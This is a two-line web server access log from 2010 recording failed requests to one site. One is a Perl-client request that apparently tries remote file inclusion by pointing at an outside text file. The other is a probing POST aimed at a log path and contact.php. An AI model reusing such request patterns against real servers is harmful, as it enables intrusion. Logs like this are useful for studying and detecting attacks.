118.129.166.221 - - [02/Sep/2010:12:42:26 -0700] "GET /http://wonderfulcs.com/data/ray.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:42:29 -0700] "POST /logs/access_100317.log%20%20//contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
